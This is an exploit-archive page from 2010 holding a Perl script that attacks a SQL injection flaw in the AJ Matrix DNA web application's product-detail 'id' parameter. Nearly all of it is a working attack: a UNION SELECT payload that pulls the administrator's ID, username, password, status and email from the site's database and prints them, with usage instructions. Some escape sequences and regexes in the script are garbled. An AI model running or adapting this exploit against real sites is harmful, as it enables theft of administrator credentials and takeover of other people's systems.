AJ Matrix DNA SQL INJECTION

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AJ Matrix DNA SQL INJECTION
# Published : 2010-12-09
# Author : Br0ly
# Previous Title : JE Messenger 1.0 Arbitrary File Upload Vulnerability
# Next Title : CMScout 2.09 CSRF Vulnerability
#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
# 
#| -Name: AJ Matrix DNA
#| -Site: http://www.ajsquare.com/ajhome.php
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly[dot]Code[at]gmail[dot]com
#|
#| -Gretz: Osirys , Out0fBound
#|
#| -p0c:
#| -SQL INJECTION: 
#|  
#| -9999+union+all+select+0,1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15--
#|
#|  --------------------------------------
#|  -AJ Matrix DNA		           
#|   -Sql Injection                       
#|   -by Br0ly                            
#|  --------------------------------------
#|
#|
#|
#|
#| >D, And sorry for my bad english ;/
#|
#|

  use IO::Socket::INET;
  use LWP::UserAgent;
  
   my $host    = $ARGV[0];
   my $sql_path = "/index.php?do=productdetail&id=";
    
  
  if (@ARGV < 1) {
      &banner();
      &help("-1");
  }

  elsif(cheek($host) == 1) {
	  &banner();
	  &xploit($host,$sql_path);
  }
  
  else {
      &banner();
      help("-2");
  }
  
  sub xploit() {

      my $host     = $_[0];
      my $sql_path = $_[1];

      print "[+] Getting the id,login,pass,status of the admin.n";

      my $sql_atk = $host.$sql_path."-9999+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x6272306c79,0x3a,admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_status,0x3a,admin_email,0x3a,0x6272306c79)+from+ajmatrix_admin_table--";
      my $sql_get = get_url($sql_atk);
      my $connect = tag($sql_get); 
      
      if($connect =~ /br0ly:(.+):(.+):(.+):(.+):(.+):br0ly/) {
	print "[+] ID     = $1n";
	print "[+] User   = $2n";
	print "[+] Pass   = $3n";
	print "[+] Status = $4n";
	print "[+] Email  = $5n";
	exit(0);
      }
      else {
	print "[-] Exploit, Failn";
	exit(0);
      
      }
 }

   sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /$/g;
    $string =~ s/s/*/g;
    return($string);
  }

  sub cheek() {
    my $host  = $_[0];
    if ($host =~ /http://(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "n[-] Error, missed some arguments !nn";
    }
    
    elsif ($error == -2) {

        print "n[-] Error, Bad arguments !n";
    }
  
    print "[*] Usage : perl $0 http://localhost/ajmatrixdna/nn";
    print "    Ex:     perl $0 http://localhost/ajmatrixdna/nn";
    exit(0);
  }

  sub banner {
    print "n".
          "  --------------------------------------n".
          "   -AJ Matrix DNA		           n".
          "   -Sql Injection                       n".
          "   -by Br0ly                            n".
          "  --------------------------------------nn";
  }